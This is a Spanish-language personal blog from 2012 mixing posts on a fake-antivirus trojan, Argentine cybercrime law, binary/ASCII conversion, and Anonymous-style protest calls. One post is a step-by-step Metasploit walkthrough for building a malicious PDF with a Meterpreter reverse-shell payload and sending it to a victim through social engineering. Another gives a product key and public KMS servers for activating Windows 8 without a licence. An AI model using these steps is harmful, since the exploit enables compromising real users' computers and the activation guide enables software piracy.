domingo, 2 de diciembre de 2012

Y SE VA LA SEGUNDA...



Lindo troyano NO?
y BUEEE... Siempre tiene algo, nuestro amigable window$, en este caso ya tiene un hermoso virus llamado TROJ_FAKEAV.EHM es un malware (troyano) que se instala como una actualización mas de SO, camuflándose como un falso ítem de seguridad para el equipo realiza un supuesto escaneo y y se filtra en el correo electrónico.
(Win8 Security System). Es una ventaja ya que hay muchos 8 instalándose, Es un aporte que les doy para que estén atentos-



AYUDANOS¡¡¡¡¡¡¡


sábado, 1 de diciembre de 2012

Leyes sobre informatica en Argentina

La otra vez, dentro del ámbito laboral surgió una conversación con un amigo, que paso a saludar, en el cual por un tema informático se entablo un debate sobre sabotaje, robo de datos y descuido profesional por lo que la charla traía, si realmente hay leyes para lo expresado en párrafos anteriores se  nos pueda proteger tanto a un usuario básico como a una empresa. Hay que destacar que es complejo realizar un veredicto sustentable a la hora de realizar una investigación legal y llegar a realizar un juicio  en el cual la/s personas que cometieron un delito informático sean exactamente los culpables. Cabe destacar, hoy en día hay  personas y tecnología que nos brinda lo que exponemos como denuncia (informática). No siempre es real ya que hay métodos de evasión realmente buenos y complejos, por eso acudimos a expertos en auditoria forense lo cual nos lleva a realidad que muchos no conocen y que estaría bueno que lo supieran. Para los que les interese saber algo mas sobre como nos podemos proteger antes situaciones como, robo de identidas, robo de datos, propiedad intelectual, ciberseguridad, comercio electrónico les paso una pagina a
la cual yo le dedico lectura constante para saber de lo que estamos haciendo.


-PROTECCIÓN DE DATOS PERSONALES Y PRIVACIDAD

-DISPOSICIONES DE LA DIRECCIÓN NACIONAL DE PROTECCIÓN DE DATOS PERSONALES (DNPDP)


-DELITOS INFORMÁTICOS Y CIBERSEGURIDAD

sábado, 24 de noviembre de 2012

QUE FÁCIL QUE SOS

Pequeño método de activar Window$ 8 JaJaJaJa...

Esta forma la probé instalando "el mejor software operativo" y que paso... como siempre anda 
El metodo activa el Pro y luego lo pasa a Pro Media Center, bueno sin mas preámbulos empecemos-
- Lo primero que tenemos que hacer es activar el KMS (es un servidor donde se leen las licencias que se activan), para activarlo abrimos una consola CMD en modo administrador dentro del CMD copian este comando que les paso 

slmgr.vbs -ipk NG4HW-VH26C-733KW-K6F98-J8CK4 
slmgr -skms kms.cc.columbia.edu:1688 
slmgr.vbs -ato
Donde dice kms.cc.columbia.edu:1688 es el servidor KMS, ojo que me costo verlo en linea, si no les paso dos de los que consegui: deben estar en verde no en rojo 

fourdeltaone.net:1688 
85.139.164.203:1688 
kms.cc.columbia.edu:1688 
jbiz1.no-ip.org:1688 
lunar21.no-ip.org:80 

Se les activara hasta el año que viene, no se exactamente ahsta cuando por eso lo vamos a poner de por vida o hasta que nuestros amigos coloquen algun parche de los que siempre tienen problemas.
- Escriban una direccion de mail bueno porque es ahi donde te mandaran la clave del producto en aproximadamente 24hs, yo espere casi 72hs pero bueno siempre es asi
- Activa la casilla para aceptar los terminos y condiciones y luego se te reiniciara.
- El media center luego del reinicio se activara.
- Si no fue positiva la activacion intenta con esta que les paso, abran nuevamente el CMD y escriban 

slmgr.vbs -ipk AQUÍ LA CLAVE QUE LES ENVIÓ MICROSOFT 
slmgr -skms kms.cc.columbia.edu:1688 
slmgr.vbs -ato
 Y listo se activo de forma permanente.
Averiguando consegui un script para saber si realmente se activo 
slmgr -xpr
-Les aparecera una pantalla confirmando la activación 

- LOS ENLACES LOS RASTREE CON MALTEGO, Y COMO DE COSTUMBRE QUE VULNERABLE SOS... COMENTE SI LES RESULTO A MI SI, CUALQUIER COSA LES BUSCO ALGUNA OTRA SOLUCIÓN ENCANTADO DE JODERLOS... HASTA LA PRÓXIMA 

DA TU VOTO





INTERNET LIBRE (NECESITAMOS TU APOYO)


Gobiernos váyanse a la MIERDA de INTERNET


Traducción :

Hay una reunión entre el mundo del 3-14 diciembre de 2012, y bien podría decidir el futuro de la Internet a través de un tratado internacional vinculante. Se llama la conferencia mundial sobre telecomunicaciones internacionales (WCIT), y está siendo organizada por un organismo controlado por el gobierno de la ONU llama la Unión Internacional de Telecomunicaciones (UIT).
Si algunas de las propuestas en WCIT se aprueban las decisiones sobre el Internet se haría por un top-down, la vieja escuela, el gobierno centrada en la agencia a puerta cerrada. Algunas propuestas para permitir el acceso a cortarse más fácilmente, amenazan la privacidad, control y legitimar el bloqueo de tráfico en línea.
     ESTO DEBE SER DETENIDO
Sólo gobierno obtener un voto a WCIT, así que necesitamos a gente de todo el mundo para exigir que nuestros líderes mantener la Internet abierta.
Por favor difundirlo 

                Firma la petición en:


FREEANDOPEN

sábado, 17 de noviembre de 2012

Aprender Código Binario


Leer código binario y descifrarlo (Esto me lo enseñaron, ahora se los pasos para que  aprendan, lo tenia archivado )

Leer código Binario o descifrarlo pero para esto necesitan herramientas como:

La tabla de ASCII

Pasos para convertir letra, número, etc. en binario
1º paso 
-Buscar en la tabla de ASCII el número que equivale a la letra correspondiente
En este caso seria (H) mayúscula que equivale a 72 en la tabla ascii

2ºpaso
-Luego de tener el valor de (H) mayúscula que seria 72
Comenzamos a dividirlo entre 2 hasta llegar a cero
Ejemplo:
H = 72 <--valor de="de" h="h" nbsp="nbsp" p="p">
72/2 36
36/2 18
18/2 9
9/2 4.5
4/2 2
2/2 1
1/2 0.5
0/2 0

luego de haberlo hecho nos dará 8 divisiones con sus resultados
Unas con: -decimales -enteros

Los decimales representan -> 1
Los enteros representan -> 0

Quedando el ejemplo de este manera

H = 72

72/2 36 0 <--entero nbsp="nbsp" p="p">36/2 18 0 <--entero nbsp="nbsp" p="p">18/2 9 0 <--entero nbsp="nbsp" p="p">9/2 4.5 1 <--decimal nbsp="nbsp" p="p">4/2 2 0 <--entero nbsp="nbsp" p="p">2/2 1 0 <--entero nbsp="nbsp" p="p">1/2 0.5 1 <--decimal nbsp="nbsp" p="p">0/2 0 0 <--entero nbsp="nbsp" p="p">
3º paso
-luego de haber obtenido el valor binario (0 u 1) de cada división
Hacemos lo siguiente tomemos el mismo ejemplo anterior

H = 72

72/2 36 0
36/2 18 0
18/2 9 0
9/2 4.5 1
4/2 2 0
2/2 1 0
1/2 0.5 1
0/2 0 0

leemos los (0 u 1) de abajo hacia arriba quedando de la siguiente manera
------> 01001000 <---- 8="8" bits="bits" de="de" este="este" la="la" may="may" nbsp="nbsp" numero="numero" p="p" scula="scula" seria="seria">En binario

Arranquemos con algo a descifrar
H = 72

72/2 36 0
36/2 18 0
18/2 9 0
9/2 4.5 1
4/2 2 0
2/2 1 0
1/2 0.5 1
0/2 0 0


a = 97

97/2 48.5 1
48/2 24 0
24/2 12 0
12/2 6 0
6/2 3 0
3/2 1.5 1
1/2 0.5 1
0/2 0 0


c = 99

99/2 49.5 1
49/2 24.5 1
24/2 12 0
12/2 6 0
6/2 3 0
3/2 1.5 1
1/2 0.5 1
0/2 0 0

k = 107

107/2 53.5 1
53/2 26.5 1
26/2 13 0
13/2 6.5 1
6/2 3 0
3/2 1.5 1
1/2 0.5 1
0/2 0 0


e = 101

101/2 50.5 1
50/2 25 0
25/2 12.5 1
12/2 6 0
6/2 3 0
3/2 1.5 1
1/2 0.5 1
0/2 0 0


r = 114

114/2 57 0
57/2 28.5 1
28/2 14 0
14/2 7 0
7/2 3.5 1
3/2 1.5 1
1/2 0.5 1
0/2 0 0
En código binario seria así que dice....
-------------------> 01001000 01100001 01100011 01101011 01100101 01110010 <--------------- p="p">??????????????????????????????????????????????????????????????????? ......
---------------------->Pasos para descifrar un código binario <----------------------------- nbsp="nbsp" p="p">
1ºpaso 
-tomamos el código a descifrar en esta caso seria este
--> 010010000110000101100011011010110110010101110010 <-- nbsp="nbsp" p="p">
2ºpaso 
-tomamos los primero 8 bits (numero) del código que seria este
--> 01001000 <-- nbsp="nbsp" p="p">
3ºpaso 
-colocamos números de 7 al 0 debajo de los 8 bits escogidos
quedaría así
01001000
76543210

4º paso 
-ahora supongamos que los 1 son 2, y cada 1 se suma a la potencia
del que le corresponde abajo LOS CEROS NO se potencias
1 = 2

5ºPaso
-ejemplo
2^6=64
2^3=8

6ºPaso 
-sumamos los resultados quedando de esta manera
64+8=72

-Buscamos en la tabla ASCII el numero 72
72 equivale a (H) mayúscula

Empecemos a resolver del código entero

=01001000
76543210

64+8= 72 = H <--resultado nbsp="nbsp" p="p">
=01100001
76543210

64+32+1= 97 = a <--resultado nbsp="nbsp" p="p">
=01100011
76543210

64+32+2+1= 99 = c <--resultado nbsp="nbsp" p="p">
=01101011
76543210

64+32+8+2+1 = 107 = k <--resultado nbsp="nbsp" p="p">
=01100101
76543210

64+32+4+1= 101 = e <--resultado nbsp="nbsp" p="p">
=01110010
76543210

64+32+16+2= 114 = r <--resultado nbsp="nbsp" p="p">
Repuesta obtenida = averígualo

-------------------------------------> errores <------------------------------------------ nbsp="nbsp" p="p">
P.D = cuando tengamos que imaginar que el numero 1 es 2 potenciado a la 0 solamente se
Suma el numero 1 un ejemplo es la letra (c) minúscula miremos

01100011 <--esta binario="binario" c="c" en="en" es="es" la="la" min="min" nbsp="nbsp" p="p" scula="scula">76543210

2^6=64
2^5=32
2^1=2
2^0=0 <-- aqu="aqu" el="el" error="error" esta="esta" nbsp="nbsp" p="p">
la suma daría -> 98 si buscamos en la tabla ASCII este equivale a (b) minúscula

Respuesta :

Solo sumamos 64+32+2+1 = 99 que seria (c) minúscula en la tabla ASCII

--------------------------------- Ejercicio ------------------------------------------------
descifrar el siguiente codigo binario ---> 01000001 01001101 01001111 01010010 <---- nbsp="nbsp" p="p">
La tabla siguiente te puede ayudar. Muestra 8 bits porque se deriva del sistema hexadecimal y las computadoras de 8 bits. El código ASCII extendido, de 8 bits, acomoda las letras del alfabeto español, por ejemplo.

01000001 A
01000010 B
01000011 C
01000100 D
01000101 E
01000110 F
01000111 G
01001000 H
01001001 I
01001010 J
01001011 K
01001100 L
01001101 M
01001110 N
01001111 O
01010000 P
01010001 Q
01010010 R
01010011 S
01010100 T
01010101 U
01010110 V
01010111 W
01011000 X
01011001 Y
01011010 Z

domingo, 28 de octubre de 2012

Explotando Adobe PDF

Bueno, estaba aburrido y me puse a jugar un rato con el Metasploit, y salio esto que dar resultado:


REQUERIMIENTOS:

Backtrack 5 R1 - R2 o R3 (Atacante) yo lo hice con R3
Metasploit Framework (Atacante)
Windows XP - 7 (Victima)
Adobe Reader 9.1 (Victima)


PROCEDIMIENTOS:

Lo primero que tenemos que hacer es crear el PDF malicioso desde el Metasploit, dicho archivo sera enviado a nuestra victima usando Ing. Social para que logre abrirlo y así obtener acceso a su sistema.

Abrimos el Metasploit y tecleamos los siguientes comandos:

use exploit/windows/fileformat/adobe_pdf_embedded_exe_nojs (Usar adobe pdf embedded exe exploit)
set payload windows/meterpreter/reverse_tcp (Payload que devolvera un Meterpreter)
set filename Important_Meeting_Notice.pdf (Creara el archivo PDF malicioso)
set lhost 192.168.1.17 (IP del Atacante) 
set lport 8080 (Puerto open de la Victima)
exploit




Después de haber creado el PDF malicioso con los comandos mencionados, se almacenera en la carpeta /root/.msf4/local/ si no logras ver la carpeta /.msf4/ teclea Ctrl+H y observeras dicha carpeta.

El siguiente paso es enviar el PDF malicioso creado a nuestra victima, ya sea por e-mail, link de descarga u otros métodos que se nos pueda ocurrir (Ing. Social).

Si logramos que nuestra victima acepte dicho archivo, inmediatamente abrimos nuevamente el Metasploit en otra consola para generar la conexión que recibiremos cuando la victima ejecute el PDF, ejecutando los siguientes comandos:


use exploit/multi/handler 
set payload windows/meterpreter/reverse_tcp 
set lport 8080 
set lhost 192.168.1.17  
exploit


Cuando la victima (osea yo) ejecuta el PDF malicioso, Adobe Acrobat le mostrara un mensaje preguntándole si desea ejecutar el archivo, como indica la siguiente imagen:

Después de que la victima (yo jajaja) hice clic en "Abrir" automáticamente recibiremos la conexión inversa en nuestra consola del Metasploit, tal cual se muestra en la siguiente imagen:


Y listo! Me  "vulnere " mi sistema o puede ser otro

CONCLUSIÓN: 

Después de haber realizado con éxito este ataque, se puede migrar el proceso explorer.exe en nuestra victima.

La versión vulnerable de este ataque es el Adobe Acrobat 9.1, por lo tanto si no queremos ser victima de dicho ataque, les recomiendo actualizar a una versión mayor.

El explicativo es solo con fines EDUCATIVOS, cualquier uso malintencionado que le den es responsabilidad entera de cada uno.








CONECTAR IGUALDAD NUEVO FORMATO

En el 2013 las netbooks de conectar igualdad no solo traerán Huayra, sino que tambien traerán Window$ 7, lo único que cambia es el orden de booteo, esta vez traerán bootenado por defecto Huayra. No soy adepto al software privativo pero, es una realidad que se usa y mucho y la mayoria de la gente aprende computación con este tipo de software, por ahora..., y los chicos que nunca iban a poder tener una computadora en su vida y solo las veían en los cibers, van a tener una oportunidad de aprender informática privativa que se usa en muchas partes. Lo bueno seria que aprendieran a usar el Huayra y conozcan el mundo LINUX para que estén mejor preparados para su futuro. Es también cierto que los docentes solo manejan window$, seria bueno que lo capaciten con LINUX y que el país como GOBIERNO DE TODOS y PARA TODOS (jajajaja) pueda implementar el SOFTWARE LIBRE en la Administración Publica. Les paso algunas imágenes de HUAYRA






sábado, 8 de septiembre de 2012

[EE.UU.] [EN] 10/20/2012 # OpBigBrother protesta mundial

ESTO ES LO QUE NOS ESPERA 


Hacemos un llamado a actuar ahora contra generales de vigilancia-Systems. gobiernos en todo el mundo están a punto de demoler Privacidad de Sistemas como Trapwire y Indect. Las tecnologías de vigilancia en red oler las cámaras de circuito cerrado de televisión, bases de datos del gobierno y la Internet para identificar a las personas y hacer un perfil de los ciudadanos, sus familias y su socialización. Pretenden diseñar estos sistemas para asegurarnos contra el terrorismo, pero la verdad es que han estado trabajando en vigilancia-Systems manera antes de los ataques terroristas por primera vez. ¡Es hora de actuar, es el momento de demostrar a los gobiernos del mundo, quiénes somos, es el momento de mostrar la humanidad está tan unido, es el momento de mostrar lo que la libertad significa para nosotros. Hacemos un llamamiento a todos los activistas el mundo, desde el sur y el norte de América, de Asia, de África, de Australia y de Oceanía, desde la primavera árabe y de la Unión Europea, de formar parte de la protesta, en contra de los sistemas de vigilancia. Actúe ahora y corre la voz en su lengua materna, introduzca sus países y ciudades, en la almohadilla vinculado a la descripción de este vídeo. gobiernos se suponen para defender los intereses de sus pueblos. Ellos no están aquí para engañar a los ciudadanos. Es nuestra libertad y nuestra privacidad. Unámonos a toda la humanidad como una sola. Deja que sea los más masivos de la historia del mundo. Vamos a grabar el 20 de octubre de 2012 como un día en la Humanidad historia! United We Stand, Divided We Fall. Nosotros somos el pueblo Somos el único sistema, Somos Anonymous, Somos Legión. Nosotros no perdonamos. ¡No lo olvides. esperan obtener más información sobre OpBigBrother # / # INDECT / # OpTrapwire:
http://pastebin.com/PgbvQrt8   Traducción del texto
http://pastebin.com/T9B53btM   IRC: # irc.anonops.com/6697 SSL


Busquedas